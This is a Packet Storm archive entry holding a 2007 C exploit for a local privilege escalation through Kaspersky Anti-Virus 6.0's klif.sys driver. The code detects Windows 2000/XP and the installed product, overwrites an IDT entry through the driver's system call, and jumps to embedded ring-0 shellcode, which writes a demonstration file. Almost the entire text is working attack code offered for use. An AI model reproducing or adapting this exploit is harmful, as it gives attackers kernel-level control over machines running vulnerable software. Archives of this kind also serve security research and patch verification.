Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormM4dPACKETSTORM:53690
HistoryJan 16, 2007 - 12:00 a.m.

kav60-escalate.txt

2007-01-1600:00:00
m4d
packetstormsecurity.com
22
JSON
`// kav 6.0 0day local priv escalation exploit  
// by m4d   
// http://unl0ck.net  
#include <windows.h>  
#include <stdlib.h>  
#include <stdio.h>  
  
  
// r0-shellcode creates C:\Hello.txt with "Hello from ring-0! :)"  
  
unsigned char Shellcode[405] = {  
0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xBC, 0x60, 0x83, 0x4D, 0xE8, 0xFF, 0x0F, 0x01, 0x4D, 0xFA, 0x8B,   
0x4D, 0xFC, 0x81, 0xC1, 0x50, 0x01, 0x00, 0x00, 0x66, 0x8B, 0x71, 0x06, 0xC1, 0xE6, 0x10, 0x66,   
0x8B, 0x31, 0x4E, 0x66, 0x81, 0x3E, 0x4D, 0x5A, 0x75, 0xF8, 0x8B, 0x46, 0x3C, 0xA9, 0x00, 0xFF,   
0xFF, 0xFF, 0x75, 0xEE, 0x81, 0x3C, 0x30, 0x50, 0x45, 0x00, 0x00, 0x75, 0xE5, 0xE8, 0x00, 0x00,   
0x00, 0x00, 0x58, 0x8D, 0x90, 0xB7, 0x00, 0x00, 0x00, 0x8D, 0x5A, 0x58, 0x8B, 0xC6, 0x6A, 0x0D,   
0x59, 0xFF, 0xD3, 0x89, 0x45, 0xEC, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x08, 0x59, 0xFF, 0xD3, 0x89,   
0x45, 0xF0, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x0C, 0x59, 0xFF, 0xD3, 0x89, 0x45, 0xF4, 0x03, 0xD1,   
0x89, 0x55, 0xE4, 0x6A, 0x20, 0x58, 0x66, 0x89, 0x45, 0xE0, 0x66, 0x89, 0x45, 0xE2, 0x8D, 0x4D,   
0xC0, 0xC7, 0x01, 0x18, 0x00, 0x00, 0x00, 0x83, 0x61, 0x04, 0x00, 0xC7, 0x41, 0x0C, 0x00, 0x02,   
0x00, 0x00, 0x83, 0x61, 0x10, 0x00, 0x8D, 0x45, 0xE0, 0x89, 0x41, 0x08, 0x83, 0x61, 0x14, 0x00,   
0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x20, 0x6A, 0x03, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x8D, 0x45,   
0xD8, 0x50, 0x8D, 0x45, 0xC0, 0x50, 0x68, 0x04, 0x00, 0x10, 0x00, 0x8D, 0x45, 0xBC, 0x50, 0xFF,   
0x55, 0xEC, 0x85, 0xC0, 0x75, 0x2D, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x17, 0x8B, 0x45, 0xE4, 0x0F,   
0xB7, 0x4D, 0xE0, 0x03, 0xC1, 0x50, 0x8D, 0x45, 0xD8, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00,   
0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF4, 0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF0, 0xC7, 0x45, 0xE8, 0xEF,   
0xBE, 0xAD, 0xDE, 0x61, 0x8B, 0x45, 0xE8, 0xC9, 0xCF, 0x5A, 0x77, 0x43, 0x72, 0x65, 0x61, 0x74,   
0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5A, 0x77, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x00, 0x5A, 0x77,   
0x57, 0x72, 0x69, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5C, 0x00, 0x3F, 0x00, 0x3F, 0x00,   
0x5C, 0x00, 0x43, 0x00, 0x3A, 0x00, 0x5C, 0x00, 0x48, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x6C, 0x00,   
0x6F, 0x00, 0x2E, 0x00, 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20,   
0x66, 0x72, 0x6F, 0x6D, 0x20, 0x72, 0x69, 0x6E, 0x67, 0x2D, 0x30, 0x21, 0x20, 0x3A, 0x29, 0x0D,   
0x0A, 0x60, 0x8B, 0x50, 0x3C, 0x8B, 0x54, 0x10, 0x78, 0x03, 0xD0, 0x8B, 0x5A, 0x20, 0x03, 0xD8,   
0x33, 0xED, 0x8B, 0x4A, 0x18, 0x51, 0x8B, 0x4C, 0x24, 0x1C, 0x8B, 0x33, 0x03, 0xF0, 0x8B, 0x7C,   
0x24, 0x18, 0xF3, 0xA6, 0x59, 0x74, 0x06, 0x45, 0x83, 0xC3, 0x04, 0xE2, 0xE8, 0x8B, 0x4A, 0x24,   
0x03, 0xC8, 0x0F, 0xB7, 0x0C, 0x69, 0x8B, 0x6A, 0x1C, 0x03, 0xE8, 0x95, 0x03, 0x2C, 0x88, 0x89,   
0x6C, 0x24, 0x1C, 0x61, 0xC3  
};  
  
  
  
  
typedef struct _FIRST_PARAM {  
ULONG SwitchIndex;  
ULONG Unknown; // 0xFF0002...0xFF000F, if this parameters won't be in the list of klif.sys, sploit won't work..  
ULONG Value; // this value will rewrite DWORD of memory  
} FIRST_PARAM, *PFIRST_PARAM;  
  
  
  
  
  
void main(int argc, char* argv[])  
{  
__try  
{  
FIRST_PARAM Param1;  
ULONG Param2; // pointer to write DATA - 8  
CHAR Idtr[6];  
CHAR IsKAVInstalled;  
OSVERSIONINFOEX os;  
  
  
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);  
GetVersionEx((LPOSVERSIONINFO)&os);  
  
if (os.dwPlatformId != VER_PLATFORM_WIN32_NT ||  
os.dwMajorVersion != 5 ||  
os.dwMinorVersion > 1)  
{  
printf("This OS version unsupported\n");  
return;  
}  
  
// , KAV   
  
__asm {  
cmp os.dwMinorVersion, 0  
jnz short $+13  
mov eax, 0F8h // 2k  
jmp short $+7  
mov eax, 11Ch // xp  
int 2Eh  
  
cmp eax, 0Ch  
setz al  
mov IsKAVInstalled, al  
}  
  
if (!IsKAVInstalled)  
{  
printf("KAV6 didn't installed\n");  
return;  
}  
  
Param1.SwitchIndex = 3; // Index of jmp in case of switch()  
Param1.Unknown = 0xFF0002;  
  
__asm {  
pusha  
sidt Idtr  
  
mov eax, dword ptr [Idtr+2]  
  
add eax, 0DAh * 8 - 8  
mov Param2, eax  
  
// Write lower DWORD IdtEntry  
  
mov ecx, offset Shellcode  
and ecx, 0000FFFFh  
or ecx, 00080000h  
mov Param1.Value, ecx // Set DWORD: [selector 0x0008 | LOWORD(Shellcode)]  
  
push Param2  
lea eax, Param1  
push eax  
  
mov edx, esp  
cmp os.dwMinorVersion, 0  
jnz short $+13  
mov eax, 100h // 2k  
jmp short $+7  
mov eax, 124h // xp  
int 2Eh  
add esp, 2*4  
  
// Write high DWORD IdtEntry  
  
add Param2, 4  
  
mov ecx, offset Shellcode  
and ecx, 0FFFF0000h  
or ecx, 0000EE00h  
mov Param1.Value, ecx // Set DWORD: [HIWORD(Shellcode) | gate parameters 0xEE00]  
  
push Param2  
lea eax, Param1  
push eax  
  
mov edx, esp  
cmp os.dwMinorVersion, 0  
jnz short $+13  
mov eax, 100h // 2k  
jmp short $+7  
mov eax, 124h // xp  
int 2Eh  
add esp, 2*4  
  
// Call Gate :-) (COLGATE)  
  
push fs  
int 0DAh  
pop fs  
  
popa  
}  
  
printf("Exploited successful\n");  
}  
__except(1) {  
printf("Can't create interrupt gate\n");  
}  
}  
  
// 15.01.07 MaD  
`
JSON